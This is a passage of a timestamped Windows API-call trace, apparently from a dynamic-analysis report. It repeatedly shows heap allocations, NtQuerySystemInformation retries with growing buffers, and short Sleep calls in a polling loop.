RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.334] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.334] Sleep (dwMilliseconds=0x110) [0240.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.348] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.348] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.349] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.349] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.349] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.349] Sleep (dwMilliseconds=0x110) [0240.365] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.365] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.366] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.366] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.366] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.366] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.366] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.367] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.367] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.367] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.367] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.368] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.375] Sleep (dwMilliseconds=0x110) [0240.388] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.388] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.388] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.388] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.388] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.389] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.394] Sleep (dwMilliseconds=0x110) [0240.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.406] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.407] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.408] Sleep (dwMilliseconds=0x110) [0240.433] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.433] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.434] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.434] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.434] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.435] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.435] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.435] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.435] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.435] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.435] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.436] Sleep (dwMilliseconds=0x110) [0240.453] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.454] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.457] Sleep (dwMilliseconds=0x110) [0240.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.474] Sleep (dwMilliseconds=0x110) [0240.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.489] Sleep (dwMilliseconds=0x110) [0240.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.504] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.504] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.505] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.505] Sleep (dwMilliseconds=0x110) [0240.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.520] Sleep (dwMilliseconds=0x110) [0240.528] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.529] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.535] Sleep (dwMilliseconds=0x110) [0240.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.551] Sleep (dwMilliseconds=0x110) [0240.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.562] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.563] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.563] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.563] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.566] Sleep (dwMilliseconds=0x110) [0240.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.586] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.586] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.586] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.587] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.587] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, 